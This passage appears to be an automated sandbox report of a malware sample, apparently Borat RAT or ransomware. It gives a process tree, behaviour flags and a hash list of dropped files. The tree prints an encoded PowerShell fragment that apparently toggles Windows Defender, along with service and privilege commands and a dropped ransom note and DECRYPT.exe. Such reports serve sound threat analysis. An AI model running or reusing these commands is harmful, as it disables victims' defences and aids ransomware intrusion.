QAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4804
                  • C:\Windows\system32\sc.exe
                    "C:\Windows\system32\sc.exe" qc windefend
                    3⤵
                    • Launches sc.exe
                    PID:1448
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                    3⤵
                      PID:788
                    • C:\Windows\system32\whoami.exe
                      "C:\Windows\system32\whoami.exe" /groups
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4584
                    • C:\Windows\system32\net1.exe
                      "C:\Windows\system32\net1.exe" start TrustedInstaller
                      3⤵
                        PID:2432
                      • C:\Windows\system32\net1.exe
                        "C:\Windows\system32\net1.exe" start lsass
                        3⤵
                          PID:2476
                    • C:\Windows\system32\taskmgr.exe
                      "C:\Windows\system32\taskmgr.exe"
                      1⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2128
                    • C:\Users\Admin\Desktop\Borat\Client.exe
                      "C:\Users\Admin\Desktop\Borat\Client.exe"
                      1⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: RenamesItself
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3592
                      • C:\Windows\system32\NOTEPAD.EXE
                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ-ME-NOW.txt
                        2⤵
                          PID:804
                        • C:\Users\Admin\Desktop\DECRYPT.exe
                          "C:\Users\Admin\Desktop\DECRYPT.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1864
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\CloseConvertTo.xhtml
                        1⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of WriteProcessMemory
                        PID:3720
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd8
                          2⤵
                            PID:5068
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
                            2⤵
                              PID:3656
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
                              2⤵
                                PID:1300
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
                                2⤵
                                  PID:3352
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
                                  2⤵
                                    PID:1032
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
                                    2⤵
                                      PID:4384
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:8
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:2264
                                      • C:\Windows\system32\OpenWith.exe
                                        C:\Windows\system32\OpenWith.exe -Embedding
                                        1⤵
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2244
                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\GetMeasure.mhtml
                                        1⤵
                                        • Modifies Internet Explorer settings
                                        PID:1616
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                        1⤵
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        PID:2112
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd8
                                          2⤵
                                            PID:4996
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
                                            2⤵
                                              PID:2692
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                              2⤵
                                                PID:3288
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
                                                2⤵
                                                  PID:2748
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                  2⤵
                                                    PID:3568
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                    2⤵
                                                      PID:4172
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
                                                      2⤵
                                                        PID:3736
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
                                                        2⤵
                                                          PID:676
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
                                                          2⤵
                                                            PID:1452
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                                                            2⤵
                                                              PID:4604
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                                                              2⤵
                                                                PID:1828
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3012 /prefetch:8
                                                                2⤵
                                                                  PID:1372
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
                                                                  2⤵
                                                                    PID:1900
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:1592
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:4700
                                                                    • C:\Windows\system32\OpenWith.exe
                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:3728
                                                                    • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                      "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
                                                                      1⤵
                                                                        PID:1572
                                                                        • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
                                                                          "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
                                                                          2⤵
                                                                            PID:4000
                                                                          • C:\Windows\SysWOW64\unregmp2.exe
                                                                            "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
                                                                            2⤵
                                                                              PID:4584
                                                                              • C:\Windows\system32\unregmp2.exe
                                                                                "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
                                                                                3⤵
                                                                                • Enumerates connected drives
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1424
                                                                          • C:\Windows\system32\msinfo32.exe
                                                                            "C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\DebugFind.nfo"
                                                                            1⤵
                                                                            • Checks SCSI registry key(s)
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            PID:3264
                                                                          • C:\Windows\system32\OpenWith.exe
                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                            1⤵
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:996
                                                                          • C:\Windows\system32\OpenWith.exe
                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                            1⤵
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4652
                                                                          • C:\Windows\system32\OpenWith.exe
                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1748
                                                                          • C:\Windows\system32\vssvc.exe
                                                                            C:\Windows\system32\vssvc.exe
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3892
                                                                          • C:\Windows\system32\OpenWith.exe
                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                            1⤵
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1368
                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2264

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png

                                                                            Filesize

                                                                            50KB

                                                                            MD5

                                                                            2bcd76e70e270f4d9b0404887ff9309c

                                                                            SHA1

                                                                            657bafb280f78c8bbf2027d16f3e0f21595d9d0b

                                                                            SHA256

                                                                            aff399fcdd6d2d5c9ad5672b28a2650f2d2d8966f7641cf8e1dd9f4ed7c9335e

                                                                            SHA512

                                                                            864b80e8371e9b64fa71972d2ca54d8eb67a8abce6610699ea7d8482aa9b10fca1c3b470c77e651474c3600818acb99d09b1fd08590de69113a505a4c626969b

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            9fdd3ea9132d1ba41e9dd26e23ebb047

                                                                            SHA1

                                                                            242762baa21fa809798619b22415b1ecad9b7379

                                                                            SHA256

                                                                            5158d24f88c9f2b4f736da89b067fa185ad5c9b709138ac5985ac45093d4c230

                                                                            SHA512

                                                                            95338657100f45f24774ed3c178cc6ccc41fb8c99ac67b26d7091d3e59ceec2cad2987b21c05dc0e987e6f9c06890fb26de73d64a75d148788f8f74f6938e6a4

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png

                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            3e1b9034fffb589e141fd92a8c5659da

                                                                            SHA1

                                                                            d17b146c4bb8dc7c8e149c6f49df719decd88432

                                                                            SHA256

                                                                            ccb2cd07c2934502fb09e58bf190c4286d6decb9702bb7547c86cfc396e0c4eb

                                                                            SHA512

                                                                            41112c8ce7d0be04ecc8bde59f613d52342e0d76b121ed71afdd16a0176727867ab94402de4203a8b900e1fc949d887aff587f577a58d6cb1db502fbd25927bc

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png

                                                                            Filesize

                                                                            688B

                                                                            MD5

                                                                            1b967d6db333e2c943deb96f683294d1

                                                                            SHA1

                                                                            4eb9732299c5cac83253b12db5c856a2377364f8

                                                                            SHA256

                                                                            4d0b765ca0f5a1c81d73a8433c79eb2a2c50e80bab44794dfc50f443290e2d6b

                                                                            SHA512

                                                                            07f59a8879b1c19b629b30d2ee6b3c996e89635d4c692a2eb8dfb6c135c879cacbf6284bc6376fcbdb6ac4c1782f75bf767cb6ba2b32342c3093e2a5b3fbbf5a

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            73d2d111b055d4664b078b834f26ab2b

                                                                            SHA1

                                                                            6fb2b734767c75975a6bde9c45b6080f522c77c1

                                                                            SHA256

                                                                            7d433dcbcdfa9b17978639e6c0be371f8474683f4b69542433da9ce7f29236aa

                                                                            SHA512

                                                                            357127b51139795f0f63eb911d477cd6c128c79fd18f5a9a06bd8e030d3730260bd378354f00b51f8e8b3962989ef73af8befdaab3903346c95c3fdc765f1c6d

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png

                                                                            Filesize

                                                                            448B

                                                                            MD5

                                                                            3312ec3e84757d9010bfcce334b17d00

                                                                            SHA1

                                                                            1f7bc53f87314ca45ff97a4bea4b94f56ffd2b37

                                                                            SHA256

                                                                            9ad6e097e6c3475829e414b16996e4d0d56c55f448b8916479b7d51a8b1c2638

                                                                            SHA512

                                                                            766785d3cac28e75bd5dcf717dc7c7e57f2cf87165c0fef295756eb71f1756d1bd1e9404e81cb2089e367e79cf11468b92e9bc737b6d67e8f25a27103a3ee425

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png

                                                                            Filesize

                                                                            624B

                                                                            MD5

                                                                            72c74c73de45dcccacf48dadcca387f8

                                                                            SHA1

                                                                            4078866b700a805f9152ad125506f624470ede9a

                                                                            SHA256

                                                                            e4cf6e2401558cd6b3b5389c551ba017eecfab630196b7817d76c4322236ac78

                                                                            SHA512

                                                                            ce0ca668bd7c3a14d9742d4c53bce073022a8fbe288108cb0aa3d29daaaee5fc2a7fd3580aea841b1fd0d205b6477b2523d5ca939b65b82f18e3b077c946b723

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png

                                                                            Filesize

                                                                            400B

                                                                            MD5

                                                                            a5b4b6728b5dfe0eb2c3ef6261db251f

                                                                            SHA1

                                                                            47e20dcf055a4a093334727e4b2cfacf5439f239

                                                                            SHA256

                                                                            4c2c6dfbd38a94c6a4d59dc3fa097ec87eedcdbca5fe70887e7112c4549cf8d5

                                                                            SHA512

                                                                            84249676242f8dc2ed6a7d3994136a0c64f58ff8cad6630ed5db8bdf269ae6f9ce1f8bc9e27600971825617ff41b97e6da416f08c29fba16e8593a57b7f94821

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png

                                                                            Filesize

                                                                            560B

                                                                            MD5

                                                                            06b44436b3589e8f4e5019b5ad051133

                                                                            SHA1

                                                                            580377af4a40b3e9805790db8489208ff83bab36

                                                                            SHA256

                                                                            f3226bc2e8cd94b5623b3408ba7d354da909ec83ac3774d87778e9ec26db0e36

                                                                            SHA512

                                                                            aa4c6067d47b8478e8edcf69ae84b0d738a489ff17b02f1d32657cb8f43d66e829977fe43374f6a729debaa9dd234f7a7c1b322816cc78d016ce9aced3b6cbb8

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png

                                                                            Filesize

                                                                            400B

                                                                            MD5

                                                                            60eab2d1abf9985f1e15650cb295aea5

                                                                            SHA1

                                                                            cc008d49f277dd8b75ac92f0874bc4606c1a1c97

                                                                            SHA256

                                                                            97bd7c426781ac5bf3ebe42c92c8fe0a235a048ff4243c52c09a9487c231d9ea

                                                                            SHA512

                                                                            6cee9f61a42305659279930d35cba48bad20f637dea984f7b89a529334325f1ac86ddc9b16767914aae427ba878a8288f3465544cb2e5735b2ff3305028978fd

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png

                                                                            Filesize

                                                                            560B

                                                                            MD5

                                                                            f26089befa3c95edcfe6930f116b8b36

                                                                            SHA1

                                                                            64a92ee37f7cb6bc8e49126b9f5691d0b2c5a03a

                                                                            SHA256

                                                                            2951403fb358391012da897fcd01d682744a989b1c9fdde85cedba5afefcc422

                                                                            SHA512

                                                                            645657982067a108774832ba33202b827f18ef52477c960c7e65bdcced029d999a9b32fddb1b7ef63271c8e99409d33f69dd925d6758fecd4be0a8683c2b9fc4

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png

                                                                            Filesize

                                                                            400B

                                                                            MD5

                                                                            ca3ec706cf41d9cd19842a51f7399cee

                                                                            SHA1

                                                                            dcd539f9d5d7d5adcdfd260e7c737c8c4887a385

                                                                            SHA256

                                                                            9ad930f0d2d7b9ed12e9e8a189c9118432bd5daec67f8085aa6bf24fefd853d8

                                                                            SHA512

                                                                            35617ab70869a2c1d4a63cb44b826ff0b1dc76f12d2318ec48a2ecd432df26731845d1b79337b421be32e9659d701dc5245ab9eab4fae3d0b27ae2b243f7ae29

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png

                                                                            Filesize

                                                                            560B

                                                                            MD5

                                                                            ac881fefa433aa39bea341e674da83ea

                                                                            SHA1

                                                                            4f2b04df946218d8b8c49bbd1de83a2d52ab137e

                                                                            SHA256

                                                                            55eb0e991fff25994b0d15f7587d8b2b8d6c0b8ffc4afeafd2f556304df86012

                                                                            SHA512

                                                                            f5e07154b243f0c0a6604d67dd418f31ddd4155092ebcb0afd6e1dd8b56184382d6b36a0e3b53dc59e987154746be22fd4dbf244251b6bea6ad3f9d7d629a359

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png

                                                                            Filesize

                                                                            7KB

                                                                            MD5

                                                                            f231d29de1d9859df794e14f96734cd0

                                                                            SHA1

                                                                            f4b4c015524249419c1ea12022a8c3b4bde51676

                                                                            SHA256

                                                                            8d1fdff98204874d8578d722f83e1db83c8ce99c0c808d0974f29f5360dd6d85

                                                                            SHA512

                                                                            99388bd1a7717546c876dccd23e03f472280ceac2078d169ca181c3dda9fecc86f137037b462d9543664b8e45f7e90cd2c7e083e1c653420e1715b958bc3ec03

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif

                                                                            Filesize

                                                                            7KB

                                                                            MD5

                                                                            90002005d0c5c99b18fa346250e6a416

                                                                            SHA1

                                                                            4511c3f13e23e6b5691e6d5c43aeee2034177f7b

                                                                            SHA256

                                                                            d1782cf11ba8dec8c817666ef614a0571511cc13bd9f8eacc1d3233f25526d8d

                                                                            SHA512

                                                                            43df4c010595d665d5fb6a1f4b173a0242ac849d36cb5089fa4081859c78df77c9a02cd92719a34b160053666f53e7a363e603048797b9e84254683046cb7695

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png

                                                                            Filesize

                                                                            15KB

                                                                            MD5

                                                                            1527e7a50e10538a4792e02c73f280fe

                                                                            SHA1

                                                                            faa8822d925bd36d361487861b9cd6e495b8387e

                                                                            SHA256

                                                                            b47af3057bf73b96dd1cdd8d68a224c1c2555b711593e9b2d54b7615ef37a8c9

                                                                            SHA512

                                                                            d9671bc7f30ff1c099162765c8f2527be8fd82fb940627b4f65f4537e0ca1bbcf1fd023bfb439293a210064f4217ee6ec45c2ead535b24dfd3ccdbb7815e188c

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png

                                                                            Filesize

                                                                            8KB

                                                                            MD5

                                                                            f6130ccc0d741f3df6330f91916b65c7

                                                                            SHA1

                                                                            7399ae5008015ed9b944083eef67cfc22948de74

                                                                            SHA256

                                                                            d799fd16e4438a0054862e2920adf6434fb23f771e8f9f35d4c83b8705705aa9

                                                                            SHA512

                                                                            c59e31b8437ebab6b90511ec298f6761263a0e74eb24edb272bf0e0443476045510e3ca9e267dfc656657ab1d0f9d4f974bc4a4f06c0247d5339a67e3f885087

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png

                                                                            Filesize

                                                                            17KB

                                                                            MD5

                                                                            452e5accd9111e8e99e0f54c614ee65c

                                                                            SHA1

                                                                            4472d512e18a1ece1973e2c1a1bb005fc6df9fd5

                                                                            SHA256

                                                                            a95db8758184ee3162bcb46095d131809cc8d6f6cfb4b17ee9fa656c82a74478

                                                                            SHA512

                                                                            4ef31a368e2d99d6947b790eae0944d2d6ef7311a26077d1f0010589b08d843b63d241e9522ec0a4c7125b48f1b07af6ac9109a7f2d40d2d313e941986def4b6

                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png

                                                                            Filesize

                                                                            192B

                                                                            MD5

                                                                            2425ec0786ab2b067ff129b5a0857f0e

                                                                            SHA1

                                                                            58d8fd90e1afe972706f605bbc42217fbe555b0c

                                                                            SHA256

                                                                            58f64442aeb924cf589bf79ca6490fbe43da89f72fc6551ca6a2ca800e7e3498

                                                                            SHA512

                                                                            bd684f9f903b101553246ad662d745cde6f7b6919d1636656b11c6dd9edd8cdc7da82f3007a42ef8029007a22fc17e21b69e6c93570fe24dc3cf72d0a07c9202

